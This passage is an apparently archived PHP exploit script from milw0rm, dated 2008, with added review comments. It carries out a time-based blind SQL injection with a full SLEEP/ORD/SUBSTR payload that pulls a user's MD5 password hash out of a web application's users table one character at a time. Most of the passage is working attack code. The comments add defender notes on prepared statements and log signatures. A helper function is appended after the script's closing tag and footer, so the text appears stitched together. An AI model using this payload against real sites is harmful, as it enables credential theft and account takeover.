die("\n[-] Login failed!\n");
    }
}
// Time-based blind SQL injection proof of concept: the loop below recovers the
// user_password column for user id $uid from {$prefix}_users one character at
// a time, using response delay as the only signal. $uid, $count, $prefix,
// getusername() and getdelay() are defined outside this excerpt.
//
// Defender notes: the payload opens with a quote that closes a string literal,
// which implies the target builds its SQL by concatenating a request parameter;
// a prepared statement with a bound parameter removes that injection point.
// In server logs this pattern appears as a burst of near-identical requests
// from one client carrying SLEEP/ORD/SUBSTR, up to 17 per recovered character,
// with one slow response closing each group. The script expects user_password
// to hold a 32-hex-digit MD5 digest; MD5 is a fast hash, so a disclosed digest
// is cheap to attack offline, and a slow salted password hash limits the
// impact of such a leak.
$user = getusername($uid);
print "\n[-] Username: {$user}";
// Candidate byte values: 48-57 are ASCII '0'-'9' and 97-102 are 'a'-'f', the
// hex alphabet of an MD5 digest. The leading 0 acts as the end marker;
// presumably it matches once $index runs past the stored value (confirm
// against the DBMS behaviour of ORD() on an empty string).
$hash = array(0, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 97, 98, 99, 100, 101, 102);
// SUBSTR() position of the character currently being tested (starts at 1).
$index = 1;
$md5 = "";
print "\n[-] MD5 Hash: ";
// Keep going until a NUL byte (the end marker) has been appended to $md5.
// NOTE(review): strpos() returns 0 for a match at offset 0, and !strpos()
// treats that the same as "not found".
while (!strpos($md5, chr(0))) {
    // $i deliberately runs one past the last candidate so that exhausting the
    // whole list without a delayed response aborts the script.
    for ($i = 0, $n = count($hash); $i <= $n; $i++) {
        if ($i == $n) {
            die("\n\n[-] Exploit failed...\n");
        }
        // Conditional-delay predicate: the database sleeps $count seconds only
        // when the byte at position $index equals the current candidate.
        $sql = "'OR(SELECT IF(ORD(SUBSTR(user_password,{$index},1))={$hash[$i]},SLEEP({$count}),1) FROM {$prefix}_users WHERE user_id={$uid})#";
        // presumably getdelay() reports milliseconds, since it is compared
        // with $count * 1000 — confirm against its definition
        if (getdelay($sql) >= $count * 1000) {
            $md5 .= chr($hash[$i]);
            print chr($hash[$i]);
            break;
        }
    }
    $index++;
}
// Final plausibility check on the collected text.
// NOTE(review): eregi() was removed in PHP 7.0, so this script only runs on
// PHP 5-era interpreters; the pattern is unanchored and its character class
// also admits a literal comma, so the check is looser than "exactly 32 hex
// digits".
if (!eregi("[0-9,a-f]{32}", $md5)) {
    print "\n\n[-] Invalid MD5 hash...\n";
} else {
    print "\n\n[-] Successfull!\n";
}
?>

# milw0rm.com [2008-05-19]
/**
 * Report whether a query's measured response delay is clearly above a threshold.
 *
 * The query is timed with getdelay() (defined elsewhere in this file), the
 * result is truncated to an integer, and that value is compared with twice
 * the global $ndelay (presumably the baseline delay of a normal request;
 * confirm where $ndelay is assigned).
 *
 * @param mixed $query Value handed unchanged to getdelay().
 * @return bool True when the integer delay is strictly greater than $ndelay * 2.
 */
function check_query($query)
{
    global $ndelay;

    $elapsed = intval(getdelay($query));

    return $elapsed > $ndelay * 2;
}